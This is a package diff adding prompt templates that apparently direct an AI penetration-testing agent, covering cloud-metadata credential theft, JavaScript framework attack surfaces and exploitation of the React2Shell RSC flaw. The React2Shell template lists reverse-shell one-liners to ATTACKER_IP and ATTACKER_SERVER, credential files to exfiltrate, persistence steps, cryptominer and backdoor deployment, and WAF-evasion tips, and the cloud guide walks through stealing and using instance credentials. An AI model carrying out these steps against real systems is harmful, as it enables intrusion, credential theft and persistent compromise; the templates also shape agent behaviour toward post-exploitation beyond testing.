exaai-agent 2.0.5__py3-none-any.whl → 2.0.6__py3-none-any.whl

exaaiagnt/prompts/cloud/aws_cloud_security.jinja

@@ -0,0 +1,235 @@
+<aws_cloud_security_guide>
+<title>AWS & CLOUD INFRASTRUCTURE SECURITY</title>
+
+<critical>Cloud misconfigurations are the #1 cause of data breaches. Focus on IAM, S3, EC2 metadata, Lambda, and inter-service trust relationships. These often provide paths to full infrastructure compromise.</critical>
+
+<scope>
+- AWS (EC2, S3, Lambda, IAM, RDS, etc.)
+- Azure (VMs, Blob Storage, Functions, AD)
+- GCP (Compute, Cloud Storage, Cloud Functions)
+- Multi-cloud environments
+- Kubernetes/EKS/AKS/GKE
+</scope>
+
+<!-- AWS SPECIFIC -->
+<aws>
+<title>AWS Security Testing</title>
+
+<metadata_service>
+EC2 Instance Metadata (IMDS):
+- IMDSv1: http://169.254.169.254/latest/meta-data/
+- IMDSv2: Requires token via PUT request
+- Critical paths:
+  - /latest/meta-data/iam/security-credentials/
+  - /latest/meta-data/iam/security-credentials/[ROLE_NAME]
+  - /latest/user-data
+  - /latest/dynamic/instance-identity/document
+
+SSRF to Metadata Exploitation:
+1. Identify SSRF vulnerability
+2. Request: http://169.254.169.254/latest/meta-data/iam/security-credentials/
+3. Get role name from response
+4. Request: http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE_NAME]
+5. Extract AccessKeyId, SecretAccessKey, Token
+6. Use credentials for AWS API access
+</metadata_service>
+
+<s3_attacks>
+S3 Bucket Attacks:
+- Public bucket enumeration
+- Bucket policy misconfiguration
+- ACL misconfigurations
+- Pre-signed URL abuse
+- Object versioning data recovery
+
+Testing Commands:
+- aws s3 ls s3://bucket-name --no-sign-request
+- aws s3 cp s3://bucket/file . --no-sign-request
+- Check bucket policies via GET ?policy
+- Test WRITE access: aws s3 cp test.txt s3://bucket/
+</s3_attacks>
+
+<iam_attacks>
+IAM Privilege Escalation:
+- CreatePolicyVersion escalation
+- SetDefaultPolicyVersion abuse
+- PassRole with service abuse
+- sts:AssumeRole chaining
+- Lambda execution role abuse
+- EC2 instance profile abuse
+
+Enumeration:
+- List attached policies
+- Check inline policies
+- Enumerate role trust policies
+- Map cross-account access
+</iam_attacks>
+
+<lambda_attacks>
+Lambda Security:
+- Environment variable secrets
+- IAM role permissions
+- Event injection
+- Code injection via dependencies
+- Layer poisoning
+- Alias/version manipulation
+
+Testing:
+- Extract env vars if code access
+- Test event source injection
+- Check for overprivileged roles
+- Review dependencies for vulns
+</lambda_attacks>
+</aws>
+
+<!-- AZURE SPECIFIC -->
+<azure>
+<title>Azure Security Testing</title>
+
+<metadata_service>
+Azure Instance Metadata Service:
+- Endpoint: http://169.254.169.254/metadata/
+- Requires: Metadata: true header
+- Identity endpoint: /metadata/identity/oauth2/token
+
+Get Access Token:
+GET http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
+Header: Metadata: true
+</metadata_service>
+
+<storage_attacks>
+Azure Blob Storage:
+- Anonymous access containers
+- Shared Access Signature (SAS) token abuse
+- Storage account key exposure
+- Blob snapshot access
+
+Testing:
+- Check container ACL for public access
+- Test expired SAS tokens
+- Enumerate storage accounts by name
+</storage_attacks>
+
+<ad_attacks>
+Azure AD Attacks:
+- Application secret exposure
+- Service principal abuse
+- Managed identity exploitation
+- Conditional access bypass
+- PRT (Primary Refresh Token) theft
+</ad_attacks>
+</azure>
+
+<!-- GCP SPECIFIC -->
+<gcp>
+<title>GCP Security Testing</title>
+
+<metadata_service>
+GCP Metadata Service:
+- Endpoint: http://metadata.google.internal/
+- Requires: Metadata-Flavor: Google header
+
+Key Paths:
+- /computeMetadata/v1/project/project-id
+- /computeMetadata/v1/instance/service-accounts/
+- /computeMetadata/v1/instance/service-accounts/default/token
+- /computeMetadata/v1/instance/attributes/
+
+Get Service Account Token:
+GET http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
+Header: Metadata-Flavor: Google
+</metadata_service>
+
+<storage_attacks>
+Cloud Storage Attacks:
+- Bucket ACL misconfiguration
+- Signed URL abuse
+- Object versioning access
+- Bucket policy overwrite
+</storage_attacks>
+</gcp>
+
+<!-- KUBERNETES SPECIFIC -->
+<kubernetes>
+<title>Kubernetes Security</title>
+
+Attack Surfaces:
+- API server exposure
+- RBAC misconfigurations
+- Service account token abuse
+- Secrets in environment variables
+- Privileged containers
+- Host path mounts
+- Network policy gaps
+
+Testing from Pod:
+- cat /var/run/secrets/kubernetes.io/serviceaccount/token
+- Check RBAC: kubectl auth can-i --list
+- Enumerate secrets: kubectl get secrets
+- Check for privileged access
+- Test host network access
+
+Lateral Movement:
+- Access other pods via service accounts
+- Escape to node via privileged container
+- Access cloud metadata from pod
+- Pivot to control plane
+</kubernetes>
+
+<methodology>
+1. RECONNAISSANCE
+   - Identify cloud provider (AWS/Azure/GCP)
+   - Enumerate public resources (S3, blobs)
+   - Fingerprint services and regions
+   - Find exposed credentials in code
+
+2. INITIAL ACCESS
+   - Exploit SSRF to metadata service
+   - Use exposed credentials
+   - Abuse public storage
+   - Exploit misconfigured services
+
+3. CREDENTIAL ACCESS
+   - Extract IAM credentials
+   - Steal service account tokens
+   - Dump secrets from services
+
+4. PRIVILEGE ESCALATION
+   - IAM policy abuse
+   - Role chaining
+   - Service exploitation
+
+5. LATERAL MOVEMENT
+   - Cross-account access
+   - Service-to-service trust
+   - Kubernetes pod hopping
+
+6. DATA EXFILTRATION
+   - S3/Blob data access
+   - Database extraction
+   - Secret retrieval
+</methodology>
+
+<validation>
+1. Show credential extraction with exact endpoints
+2. Demonstrate API access with stolen credentials
+3. Document privilege escalation path
+4. Provide remediation per service
+5. Test with minimal impact
+</validation>
+
+<pro_tips>
+1. Always check for SSRF to metadata - it's often the entry point
+2. IMDSv2 isn't foolproof - check for header injection
+3. Temporary credentials expire - act fast
+4. S3 bucket names are globally unique - enumerate aggressively
+5. Check for cross-account roles and trust policies
+6. Lambda environment variables often contain secrets
+7. Kubernetes RBAC is commonly over-permissioned
+8. Storage public access settings change frequently
+9. Look for hardcoded AWS keys in GitHub/public repos
+10. Cloud CLI tools often cache credentials insecurely
+</pro_tips>
+
+<remember>Cloud security failures cascade. One misconfigured IAM role or S3 bucket can lead to complete infrastructure compromise. Enumerate all trust relationships and test each privilege boundary.</remember>
+</aws_cloud_security_guide>

exaaiagnt/prompts/frameworks/modern_js_frameworks.jinja

@@ -0,0 +1,194 @@
+<modern_frameworks_guide>
+<title>MODERN JAVASCRIPT FRAMEWORK SECURITY</title>
+
+<critical>Modern JS frameworks introduce new attack surfaces through server-side rendering, hydration, server components, and edge functions. Each framework has unique security boundaries that differ from traditional web applications.</critical>
+
+<scope>
+- Next.js (React SSR/RSC)
+- Nuxt.js (Vue SSR)
+- SvelteKit
+- Remix
+- Astro
+- Fresh (Deno)
+- Qwik
+- SolidStart
+</scope>
+
+<!-- NEXT.JS SECURITY -->
+<nextjs>
+<title>Next.js Security Testing</title>
+
+Attack Surfaces:
+- Server Components (_actions, RSC payloads)
+- API Routes (/api/*, edge functions)
+- Middleware (authentication bypass)
+- Static file paths (/_next/static, source maps)
+- Image optimization (/next/image)
+- Dynamic routes ([param] paths)
+
+Known Vulnerability Patterns:
+1. React2Shell (CVE-2025-55182) - RSC deserialization RCE
+2. Server Actions injection
+3. Middleware authentication bypass
+4. SSRF via image optimization
+5. Path traversal in static assets
+6. Environment variable leakage
+7. Source code exposure via source maps
+
+Testing Methodology:
+- Identify App Router vs Pages Router
+- Enumerate all API routes
+- Test server actions for injection
+- Check middleware logic for bypasses
+- Review getServerSideProps/getStaticProps for SSRF
+- Test image optimization URL parameter
+- Look for exposed .next/server files
+</nextjs>
+
+<!-- NUXT.JS SECURITY -->
+<nuxt>
+<title>Nuxt.js Security Testing</title>
+
+Attack Surfaces:
+- Server routes (/api/*, /server/)
+- Nitro engine handlers
+- Middleware execution order
+- Static file generation
+- Plugin execution order
+- Payload extraction
+
+Vulnerability Patterns:
+1. Server route injection
+2. Nitro preset-specific issues
+3. useAsyncData/useFetch SSRF
+4. Middleware bypass via route ordering
+5. Auto-import security issues
+6. Payload prototype pollution
+
+Testing Focus:
+- Enumerate server routes
+- Test useAsyncData with controlled URLs
+- Check for exposed __nuxt.config
+- Review middleware chain for gaps
+- Test content-type switching attacks
+</nuxt>
+
+<!-- SVELTEKIT SECURITY -->
+<sveltekit>
+<title>SvelteKit Security Testing</title>
+
+Attack Surfaces:
+- Form actions (+page.server.js/ts)
+- Load functions (server-side)
+- Hooks (handle, handleError)
+- Endpoints (+server.js/ts)
+- Prerender paths
+
+Vulnerability Patterns:
+1. Form action injection
+2. Load function SSRF
+3. Hook authentication bypass
+4. Endpoint parameter injection
+5. Adapter-specific issues (node, vercel, etc.)
+
+Testing Focus:
+- Map all +page.server and +server files
+- Test form action parameters
+- Check load function URL handling
+- Review hooks for auth logic flaws
+- Test adapter-specific behaviors
+</sveltekit>
+
+<!-- REMIX SECURITY -->
+<remix>
+<title>Remix Security Testing</title>
+
+Attack Surfaces:
+- Loader functions
+- Action functions
+- Route parameters
+- Form handling
+- Session management
+- Error boundaries
+
+Vulnerability Patterns:
+1. Loader SSRF
+2. Action function injection
+3. Session cookie manipulation
+4. Route parameter injection
+5. Cross-route data leakage
+
+Testing Focus:
+- Enumerate all route modules
+- Test loader URL parameters for SSRF
+- Check action form handling
+- Review session implementation
+- Test error boundary information exposure
+</remix>
+
+<common_patterns>
+Universal Vulnerabilities Across Frameworks:
+1. HYDRATION ATTACKS
+   - Inject scripts that execute client-side post-hydration
+   - Prototype pollution via serialized state
+   - XSS via initial server state
+
+2. SSR INJECTION
+   - Template injection in server-rendered content
+   - SSTI through framework-specific syntax
+   - HTML injection before hydration
+
+3. ROUTE MANIPULATION
+   - Parameter pollution across route boundaries
+   - Dynamic route injection
+   - Catch-all route abuse
+
+4. API ROUTE BYPASS
+   - Direct API access without middleware
+   - CORS misconfiguration
+   - Authentication middleware ordering issues
+
+5. BUILD/DEPLOY EXPOSURE
+   - Source maps in production
+   - Environment variables in client bundle
+   - Debug endpoints enabled
+</common_patterns>
+
+<detection>
+Framework Fingerprinting:
+- Next.js: /_next/static, x-nextjs-* headers
+- Nuxt.js: /_nuxt/, __NUXT__ variable
+- SvelteKit: _svelte_kit/, .svelte-kit paths
+- Remix: __remix-assets, _remix headers
+- Astro: /_astro/, astro islands
+
+Version Detection:
+- Check /_next/static/chunks/webpack-*.js for Next.js version
+- Review meta generator tags
+- Analyze bundle structure and naming
+- Check error page formatting
+</detection>
+
+<validation>
+1. Confirm framework and exact version
+2. Map all server-side entry points
+3. Test each pattern systematically
+4. Provide framework-specific PoCs
+5. Document remediation per framework
+</validation>
+
+<pro_tips>
+1. Each framework has different server/client boundaries - understand them
+2. Edge functions have different capabilities than Node.js functions
+3. Development mode often exposes more than production
+4. Check build configuration for security misconfigurations
+5. Framework version upgrades often introduce new attack surfaces
+6. ISR/SSG pages may cache sensitive data inappropriately
+7. Authentication should happen in middleware, not individual routes
+8. Always test both direct API access and through UI
+9. Check for framework-specific debugging endpoints
+10. Serialization boundaries are common injection points
+</pro_tips>
+
+<remember>Modern frameworks abstract complexity but don't eliminate security concerns. Each layer (SSR, hydration, API, edge) introduces potential vulnerabilities. Test the boundaries between server and client thoroughly.</remember>
+</modern_frameworks_guide>

exaaiagnt/prompts/vulnerabilities/react2shell.jinja

@@ -0,0 +1,187 @@
+<react2shell_guide>
+<title>REACT2SHELL - RSC DESERIALIZATION RCE</title>
+
+<critical>CVE-2025-55182: Critical unauthenticated Remote Code Execution via React Server Components (RSC) Flight protocol. CVSS 10.0. Actively exploited by APT groups including China-nexus actors. Affects React 19.x and Next.js 15.x/16.x with App Router.</critical>
+
+<scope>
+- React 19.x (before 19.0.1, 19.1.2, 19.2.1)
+- Next.js 15.x/16.x with App Router
+- Vite RSC plugin
+- Parcel RSC plugin
+- React Router RSC preview
+- RedwoodSDK
+- Waku framework
+- Any framework implementing RSC Flight protocol
+</scope>
+
+<vulnerability_details>
+The vulnerability exists in the React Server Components (RSC) "Flight" protocol deserialization process. When a server processes attacker-controlled RSC payloads without sufficient validation, it becomes possible to execute arbitrary JavaScript code on the server.
+
+Key characteristics:
+- No authentication required
+- No user interaction needed
+- No elevated permissions required
+- Single HTTP request is sufficient for exploitation
+- Payload processed BEFORE application authentication logic
+</vulnerability_details>
+
+<exploit_technique>
+The React2Shell exploit leverages JavaScript duck-typing and dynamic code execution through a four-stage attack:
+
+1. SELF-REFERENCE LOOP CREATION
+   - Create a self-referential loop in the RSC payload
+   - Abuse JavaScript object property resolution
+
+2. ATTACKER CODE INVOCATION
+   - Trick JavaScript runtime into calling attacker-controlled code
+   - Leverage prototype chain manipulation
+
+3. MALICIOUS DATA INJECTION
+   - Inject malicious data for initialization
+   - Exploit deserialization to instantiate objects
+
+4. ARBITRARY CODE EXECUTION
+   - Execute code via Blob Handler
+   - Achieve RCE through Flight protocol processing
+</exploit_technique>
+
+<detection>
+Identify vulnerable targets:
+- Look for Next.js App Router indicators (/_next/static, RSC headers)
+- Check for React 19.x version disclosure
+- Identify RSC endpoints responding to Flight protocol
+- Look for x-nextjs-* headers or similar framework indicators
+- Check for /_actions endpoints (Server Actions)
+
+Vulnerable indicators:
+- Applications using "use server" directives
+- Next.js apps with app/ directory structure
+- React applications with Server Components enabled
+- Any endpoint accepting RSC Flight payloads
+</detection>
+
+<exploitation_payloads>
+System Information Gathering:
+- Execute: uname -a, whoami, hostname, id
+- Read: /etc/passwd, /etc/shadow (if root)
+- Enumerate: environment variables, AWS credentials
+
+Reverse Shell Examples:
+- bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
+- python -c 'import socket,subprocess,os;...'
+- curl ATTACKER_SERVER/shell.sh | bash
+
+Data Exfiltration Targets:
+- AWS config files: ~/.aws/credentials, ~/.aws/config
+- Environment variables: process.env export
+- Application secrets: .env files, config.js
+
+Post-Exploitation:
+- Install SSH keys for persistence
+- Create systemd services for persistence
+- Deploy cryptominers (XMRig observed in wild)
+- Deploy backdoors (PeerBlight, CowTunnel, ZinFoq)
+- Deploy Cobalt Strike/Sliver beacons
+</exploitation_payloads>
+
+<methodology>
+1. RECONNAISSANCE
+   - Identify React/Next.js applications
+   - Detect RSC endpoint locations
+   - Fingerprint framework version
+   - Map server functions and actions
+
+2. VULNERABILITY CONFIRMATION
+   - Send crafted Flight protocol payload
+   - Check for deserialization behavior
+   - Confirm RCE capability with safe command (sleep, DNS lookup)
+
+3. EXPLOITATION
+   - Develop appropriate payload for target OS
+   - Execute code to gain initial access
+   - Establish persistence if authorized
+
+4. POST-EXPLOITATION
+   - Enumerate internal network
+   - Access cloud metadata endpoints
+   - Exfiltrate sensitive data
+   - Pivot to internal systems
+
+5. REPORTING
+   - Document affected versions
+   - Provide PoC requests
+   - Detail impact assessment
+   - Recommend immediate patching
+</methodology>
+
+<related_cves>
+- CVE-2025-55182: Critical RCE (CVSS 10.0)
+- CVE-2025-55184: DoS via RSC (High severity)
+- CVE-2025-55183: Source Code Exposure (Medium severity)
+- CVE-2025-67779: Incomplete DoS fix
+</related_cves>
+
+<waf_bypass_techniques>
+- Fragment payloads across multiple requests
+- Use encoding variations (base64, hex, unicode)
+- Leverage HTTP parameter pollution
+- Send via WebSocket upgrade if available
+- Use chunked transfer encoding
+- Obfuscate JavaScript constructs in payload
+</waf_bypass_techniques>
+
+<validation>
+1. Confirm React/Next.js version is vulnerable
+2. Demonstrate code execution with harmless payload
+3. Show clear request/response with exploit
+4. Provide version-specific PoC
+5. Test in local environment before production testing
+</validation>
+
+<false_positives>
+- Next.js Pages Router (not affected, only App Router)
+- React versions before 19.x
+- Properly patched versions
+- Applications without RSC endpoints
+- Static-only Next.js deployments
+</false_positives>
+
+<impact>
+- CRITICAL: Unauthenticated Remote Code Execution
+- Full server compromise
+- Data exfiltration and manipulation
+- Lateral movement to internal networks
+- Cloud infrastructure compromise (AWS/GCP/Azure)
+- Supply chain attacks via modified deployments
+</impact>
+
+<remediation>
+IMMEDIATE ACTIONS:
+1. Update React to 19.0.1, 19.1.2, or 19.2.1+
+2. Update Next.js to latest patched version
+3. Apply Cloudflare/WAF rules for RSC payload detection
+4. Monitor for exploitation attempts
+5. Review server logs for suspicious RSC requests
+
+LONG-TERM:
+- Implement input validation on all RSC endpoints
+- Enable runtime security monitoring
+- Deploy web application firewall with RSC rules
+- Regular security assessments
+</remediation>
+
+<pro_tips>
+1. Start with version fingerprinting - exploitation depends heavily on exact version
+2. Use DNS/OAST callbacks for blind confirmation before noisy payloads
+3. Target development/staging environments before production
+4. Check for cloud metadata accessibility (169.254.169.254)
+5. Enumerate all RSC endpoints - some may have weaker protections
+6. Monitor for published PoCs and adapt payloads
+7. This vuln bypasses auth - test unauthorized access paths
+8. Check for rate limiting that might block exploitation
+9. Some WAFs detect known payloads - use custom encoding
+10. Document exact version info - patches may introduce new CVEs
+</pro_tips>
+
+<remember>React2Shell represents a critical class of server-side JavaScript deserialization vulnerabilities. Applications using React Server Components require immediate assessment, regardless of whether they explicitly use server functions. The pre-auth nature makes this exceptionally dangerous for internet-facing applications.</remember>
+</react2shell_guide>

exaaiagnt/tools/__init__.py

@@ -26,6 +26,37 @@ from .waf_bypass import (
     detect_waf,
     generate_bypasses,
 )
+from .smart_fuzzer import (
+    get_smart_fuzzer,
+    SmartFuzzer,
+    ParamType,
+    VulnCategory,
+    FuzzPayload,
+    fuzz_parameter,
+)
+from .response_analyzer import (
+    get_response_analyzer,
+    ResponseAnalyzer,
+    DetectionType,
+    Detection,
+    analyze_response,
+)
+from .vuln_validator import (
+    get_vuln_validator,
+    VulnValidator,
+    VulnStatus,
+    Severity,
+    VulnerabilityReport,
+    create_vuln_report,
+)
+from .tool_prompts import (
+    get_fuzzer_prompt,
+    get_analyzer_prompt,
+    get_validator_prompt,
+    get_waf_bypass_prompt,
+    get_security_testing_prompt,
+    get_all_tool_prompts,
+)
 
 
 SANDBOX_MODE = os.getenv("EXAAI_SANDBOX_MODE", "false").lower() == "true"
@@ -76,4 +107,31 @@ __all__ = [
     "WAFType",
     "detect_waf",
     "generate_bypasses",
+    # Smart Fuzzer
+    "get_smart_fuzzer",
+    "SmartFuzzer",
+    "ParamType",
+    "VulnCategory",
+    "FuzzPayload",
+    "fuzz_parameter",
+    # Response Analyzer
+    "get_response_analyzer",
+    "ResponseAnalyzer",
+    "DetectionType",
+    "Detection",
+    "analyze_response",
+    # Vulnerability Validator
+    "get_vuln_validator",
+    "VulnValidator",
+    "VulnStatus",
+    "Severity",
+    "VulnerabilityReport",
+    "create_vuln_report",
+    # Tool Prompts
+    "get_fuzzer_prompt",
+    "get_analyzer_prompt",
+    "get_validator_prompt",
+    "get_waf_bypass_prompt",
+    "get_security_testing_prompt",
+    "get_all_tool_prompts",
 ]